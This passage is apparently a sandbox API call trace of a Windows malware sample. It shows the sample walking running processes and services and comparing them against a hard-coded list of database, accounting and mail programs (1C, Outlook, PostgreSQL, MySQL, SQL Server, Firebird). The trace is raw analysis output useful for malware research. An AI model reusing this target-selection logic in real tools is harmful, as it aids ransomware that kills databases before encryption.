pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0272.039] lstrlenW (lpString="services.exe") returned 12 [0272.039] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1 [0272.039] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1 [0272.039] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1 [0272.039] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1 [0272.039] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1 [0272.040] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1 [0272.040] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1 [0272.040] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0272.040] lstrlenW (lpString="lsass.exe") returned 9 [0272.040] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1 [0272.040] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1 [0272.040] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1 [0272.040] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1 [0272.040] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1 [0272.040] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1 [0272.040] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1 [0272.040] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0272.040] lstrlenW (lpString="lsm.exe") returned 7 [0272.040] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1 [0272.040] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1 [0272.040] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1 [0272.040] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1 [0272.040] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1 [0272.040] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1 [0272.040] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1 [0272.041] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x250, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.041] lstrlenW (lpString="svchost.exe") returned 11 [0272.041] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.041] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.041] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.041] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.041] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.041] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.041] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.041] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x294, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.041] lstrlenW (lpString="svchost.exe") returned 11 [0272.041] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.041] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.041] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.041] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.041] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.041] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.041] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.041] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.042] lstrlenW (lpString="svchost.exe") returned 11 [0272.042] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.042] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.042] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.042] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.042] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.042] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.042] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.042] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x348, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.042] lstrlenW (lpString="svchost.exe") returned 11 [0272.042] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.042] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.042] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.042] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1 [0272.043] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1 [0272.043] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1 [0272.043] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1 [0272.043] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x36c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.043] lstrlenW (lpString="svchost.exe") returned 11 [0272.043] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1 [0272.043] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1 [0272.043] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1 [0272.043] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0272.043] lstrlenW (lpString="audiodg.exe") returned 11 [0272.043] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3f8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.044] lstrlenW (lpString="svchost.exe") returned 11 [0272.044] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x21c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.044] lstrlenW (lpString="svchost.exe") returned 11 [0272.044] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x440, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0272.044] lstrlenW (lpString="userinit.exe") returned 12 [0272.044] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x44c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x348, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0272.044] lstrlenW (lpString="dwm.exe") returned 7 [0272.044] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x45c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1e, th32ParentProcessID=0x440, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0272.045] lstrlenW (lpString="explorer.exe") returned 12 [0272.045] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x480, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0272.045] lstrlenW (lpString="spoolsv.exe") returned 11 [0272.045] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0272.045] lstrlenW (lpString="taskhost.exe") returned 12 [0272.045] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0272.045] lstrlenW (lpString="svchost.exe") returned 11 [0272.045] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x45c, pcPriClassBase=8, dwFlags=0x0, szExeFile="payload.exe")) returned 1 [0272.046] lstrlenW (lpString="payload.exe") returned 11 [0272.046] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x594, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x250, pcPriClassBase=8, dwFlags=0x0, szExeFile="dllhost.exe")) returned 1 [0272.046] lstrlenW (lpString="dllhost.exe") returned 11 [0272.046] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0272.046] lstrlenW (lpString="reader_sl.exe") returned 13 [0272.046] Process32NextW (in: hSnapshot=0x2bc, lppe=0x217fd34 | out: lppe=0x217fd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5a4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x52c, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 0 [0272.046] CloseHandle (hObject=0x2bc) returned 1 [0272.047] Sleep (dwMilliseconds=0x1f4) [0272.699] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0x43c09d0 [0272.709] EnumServicesStatusExW (in: hSCManager=0x43c09d0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 0 [0272.709] GetLastError () returned 0xea [0272.709] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0xc9a) returned 0x57d8c0 [0272.709] EnumServicesStatusExW (in: hSCManager=0x43c09d0, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x57d8c0, cbBufSize=0xc9a, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x57d8c0, pcbBytesNeeded=0x217ff44, lpServicesReturned=0x217ff5c, lpResumeHandle=0x0) returned 1 [0272.709] CloseServiceHandle (hSCObject=0x43c09d0) returned 1 [0272.709] lstrlenW (lpString="AudioEndpointBuilder") returned 20 [0272.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0272.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1 [0272.710] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1 [0272.710] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1 [0272.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1 [0272.710] lstrlenW (lpString="AudioSrv") returned 8 [0272.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1 [0272.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1 [0272.710] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1 [0272.710] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1 [0272.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1 [0272.710] lstrlenW (lpString="BFE") returned 3 [0272.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1 [0272.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1 [0272.710] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1 [0272.710] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1 [0272.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1 [0272.710] lstrlenW (lpString="CryptSvc") returned 8 [0272.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1 [0272.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1 [0272.710] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1 [0272.710] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1 [0272.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1 [0272.710] lstrlenW (lpString="CscService") returned 10 [0272.710] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1 [0272.710] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1 [0272.710] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1 [0272.710] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1 [0272.710] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1 [0272.710] lstrlenW (lpString="DcomLaunch") returned 10 [0272.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1 [0272.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1 [0272.711] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1 [0272.711] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1 [0272.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1 [0272.711] lstrlenW (lpString="Dhcp") returned 4 [0272.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1 [0272.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1 [0272.711] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1 [0272.711] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1 [0272.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1 [0272.711] lstrlenW (lpString="Dnscache") returned 8 [0272.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1 [0272.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1 [0272.711] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1 [0272.711] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1 [0272.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1 [0272.711] lstrlenW (lpString="DPS") returned 3 [0272.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1 [0272.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1 [0272.711] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1 [0272.711] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1 [0272.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1 [0272.711] lstrlenW (lpString="eventlog") returned 8 [0272.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1 [0272.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1 [0272.711] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1 [0272.711] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1 [0272.711] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1 [0272.711] lstrlenW (lpString="EventSystem") returned 11 [0272.711] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1 [0272.711] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1 [0272.712] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1 [0272.712] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1 [0272.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1 [0272.712] lstrlenW (lpString="gpsvc") returned 5 [0272.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1 [0272.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1 [0272.712] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1 [0272.712] lstrcmpiW (lpString1="mssqlserver", lpString2="gpsvc") returned 1 [0272.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="gpsvc") returned 1 [0272.712] lstrlenW (lpString="LanmanWorkstation") returned 17 [0272.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0272.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="LanmanWorkstation") returned -1 [0272.712] lstrcmpiW (lpString1="sqlwriter", lpString2="LanmanWorkstation") returned 1 [0272.712] lstrcmpiW (lpString1="mssqlserver", lpString2="LanmanWorkstation") returned 1 [0272.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="LanmanWorkstation") returned 1 [0272.712] lstrlenW (lpString="lmhosts") returned 7 [0272.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="lmhosts") returned -1 [0272.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="lmhosts") returned -1 [0272.712] lstrcmpiW (lpString1="sqlwriter", lpString2="lmhosts") returned 1 [0272.712] lstrcmpiW (lpString1="mssqlserver", lpString2="lmhosts") returned 1 [0272.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="lmhosts") returned 1 [0272.712] lstrlenW (lpString="MMCSS") returned 5 [0272.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MMCSS") returned -1 [0272.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MMCSS") returned -1 [0272.712] lstrcmpiW (lpString1="sqlwriter", lpString2="MMCSS") returned 1 [0272.712] lstrcmpiW (lpString1="mssqlserver", lpString2="MMCSS") returned 1 [0272.712] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MMCSS") returned 1 [0272.712] lstrlenW (lpString="MpsSvc") returned 6 [0272.712] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="MpsSvc") returned -1 [0272.712] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="MpsSvc") returned -1 [0272.712] lstrcmpiW (lpString1="sqlwriter", lpString2="MpsSvc") returned 1 [0272.713] lstrcmpiW (lpString1="mssqlserver", lpString2="MpsSvc") returned 1 [0272.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="MpsSvc") returned 1 [0272.713] lstrlenW (lpString="NlaSvc") returned 6 [0272.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="NlaSvc") returned -1 [0272.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="NlaSvc") returned -1 [0272.713] lstrcmpiW (lpString1="sqlwriter", lpString2="NlaSvc") returned 1 [0272.713] lstrcmpiW (lpString1="mssqlserver", lpString2="NlaSvc") returned -1 [0272.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="NlaSvc") returned 1 [0272.713] lstrlenW (lpString="nsi") returned 3 [0272.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="nsi") returned -1 [0272.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="nsi") returned -1 [0272.713] lstrcmpiW (lpString1="sqlwriter", lpString2="nsi") returned 1 [0272.713] lstrcmpiW (lpString1="mssqlserver", lpString2="nsi") returned -1 [0272.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="nsi") returned 1 [0272.713] lstrlenW (lpString="PcaSvc") returned 6 [0272.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PcaSvc") returned -1 [0272.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PcaSvc") returned -1 [0272.713] lstrcmpiW (lpString1="sqlwriter", lpString2="PcaSvc") returned 1 [0272.713] lstrcmpiW (lpString1="mssqlserver", lpString2="PcaSvc") returned -1 [0272.713] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PcaSvc") returned 1 [0272.713] lstrlenW (lpString="PlugPlay") returned 8 [0272.713] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="PlugPlay") returned -1 [0272.713] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="PlugPlay") returned -1 [0272.714] lstrcmpiW (lpString1="sqlwriter", lpString2="PlugPlay") returned 1 [0272.714] lstrcmpiW (lpString1="mssqlserver", lpString2="PlugPlay") returned -1 [0272.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="PlugPlay") returned 1 [0272.714] lstrlenW (lpString="Power") returned 5 [0272.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Power") returned -1 [0272.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Power") returned -1 [0272.714] lstrcmpiW (lpString1="sqlwriter", lpString2="Power") returned 1 [0272.714] lstrcmpiW (lpString1="mssqlserver", lpString2="Power") returned -1 [0272.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Power") returned 1 [0272.714] lstrlenW (lpString="ProfSvc") returned 7 [0272.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ProfSvc") returned -1 [0272.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ProfSvc") returned -1 [0272.714] lstrcmpiW (lpString1="sqlwriter", lpString2="ProfSvc") returned 1 [0272.714] lstrcmpiW (lpString1="mssqlserver", lpString2="ProfSvc") returned -1 [0272.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ProfSvc") returned 1 [0272.714] lstrlenW (lpString="RpcEptMapper") returned 12 [0272.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcEptMapper") returned -1 [0272.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcEptMapper") returned -1 [0272.714] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcEptMapper") returned 1 [0272.714] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcEptMapper") returned -1 [0272.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcEptMapper") returned 1 [0272.714] lstrlenW (lpString="RpcSs") returned 5 [0272.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="RpcSs") returned -1 [0272.714] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="RpcSs") returned -1 [0272.714] lstrcmpiW (lpString1="sqlwriter", lpString2="RpcSs") returned 1 [0272.714] lstrcmpiW (lpString1="mssqlserver", lpString2="RpcSs") returned -1 [0272.714] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="RpcSs") returned 1 [0272.714] lstrlenW (lpString="SamSs") returned 5 [0272.714] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SamSs") returned -1 [0272.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SamSs") returned -1 [0272.715] lstrcmpiW (lpString1="sqlwriter", lpString2="SamSs") returned 1 [0272.715] lstrcmpiW (lpString1="mssqlserver", lpString2="SamSs") returned -1 [0272.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SamSs") returned 1 [0272.715] lstrlenW (lpString="Schedule") returned 8 [0272.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Schedule") returned -1 [0272.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Schedule") returned -1 [0272.715] lstrcmpiW (lpString1="sqlwriter", lpString2="Schedule") returned 1 [0272.715] lstrcmpiW (lpString1="mssqlserver", lpString2="Schedule") returned -1 [0272.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Schedule") returned 1 [0272.715] lstrlenW (lpString="SENS") returned 4 [0272.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="SENS") returned -1 [0272.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="SENS") returned -1 [0272.715] lstrcmpiW (lpString1="sqlwriter", lpString2="SENS") returned 1 [0272.715] lstrcmpiW (lpString1="mssqlserver", lpString2="SENS") returned -1 [0272.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="SENS") returned 1 [0272.715] lstrlenW (lpString="ShellHWDetection") returned 16 [0272.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="ShellHWDetection") returned -1 [0272.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="ShellHWDetection") returned -1 [0272.715] lstrcmpiW (lpString1="sqlwriter", lpString2="ShellHWDetection") returned 1 [0272.715] lstrcmpiW (lpString1="mssqlserver", lpString2="ShellHWDetection") returned -1 [0272.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="ShellHWDetection") returned 1 [0272.715] lstrlenW (lpString="Spooler") returned 7 [0272.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Spooler") returned -1 [0272.715] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Spooler") returned -1 [0272.715] lstrcmpiW (lpString1="sqlwriter", lpString2="Spooler") returned 1 [0272.715] lstrcmpiW (lpString1="mssqlserver", lpString2="Spooler") returned -1 [0272.715] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Spooler") returned 1 [0272.715] lstrlenW (lpString="Themes") returned 6 [0272.715] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1 